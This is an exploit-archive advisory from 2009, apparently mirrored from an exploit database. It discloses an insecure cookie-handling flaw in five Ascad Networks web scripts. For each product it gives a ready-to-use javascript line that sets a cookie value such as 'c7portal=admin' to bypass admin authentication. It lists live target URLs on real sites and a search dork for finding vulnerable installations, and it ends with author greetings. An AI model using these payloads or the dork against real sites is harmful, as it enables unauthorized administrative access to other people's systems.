[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Ascad Networks 5 Products Insecure Cookie Handling Vulnerability
# Published : 2009-05-14
# Author : G4N0K
# Previous Title : my-Gesuad 0.9.14 (AB/SQL/XSS) Multiple Remote Vulnerabilities
# Next Title : My Game Script 2.0 (Auth Bypass) SQL Injection Vulnerability
==============================================================================
_ _ _ _ _ _
/ | | | | / | | | |
/ _ | | | | / _ | |_| |
/ ___ | |___ | |___ / ___ | _ |
IN THE NAME OF /_/ _ |_____| |_____| /_/ _ |_| |_|
==============================================================================
____ _ _ _ _ ___ _ __
/ ___| | || | | | | / _ | |/ /
| | _ | || |_ | | | | | | | | ' /
| |_| | |__ _| | | | | |_| | | .
____| |_| |_| _| ___/ |_|_...FROM IRAN
==============================================================================
Ascad Networks 5 Products Insecure Cookie Handling Vulnerability
==============================================================================
[??] Script:.............[ Ascad Networks Scripts ]....................
[??] Website:............[ http://www.ascadnetworks.com ]..............
[??] Today:..............[ 1305009 ]...................................
[??] Founder:............[ G4N0K | mail[.]ganok[sh!t]gmail.com ].......
[+] c7 Portal <= v1.1.0
===============================
Live...: http://hatcocorporation.com/c7/
[0] javascript:document.cookie = "c7portal=admin";
[1] now navigate to: http://hatcocorporation.com/c7/home/
esle, you will fall into a loop ;)...
[1] d0rk: intitle:"c7 Portal by Ascad Networks"
[+] Password Protector SD v2 (ppSD2)
===============================
Live...: http://ppsd2008.passwordprotectorsd.com/ppSD2/admin/
[0] javascript:document.cookie = "c7portal=admin";
[+] Form Processor Gold
===============================
Live...: http://www.ascadnetworks.com/cgi-bin/demos/fp_gold/admin.pl
[0] javascript:document.cookie = "FormProGold=in";
[+] Guestbook Creator v1.5
===============================
Live...: http://www.ascadnetworks.com/cgi-bin/demos/gb/admin.pl
[0] javascript:document.cookie = "ascadnetworks_gbook_admin=in";
[+] Mini Forum v1.0.1
===============================
Live...: http://www.ascadnetworks.com/cgi-bin/demos/mf/admin.pl
[0] javascript:document.cookie = "admf=admin";
[+] Greetz
===================================
[??] ALLAH
[??] MSD, AMD, AFN, SMN...
[??] Hussain-X, JiKo, Sakab(!)...
# www.Syue.com [2009-05-14]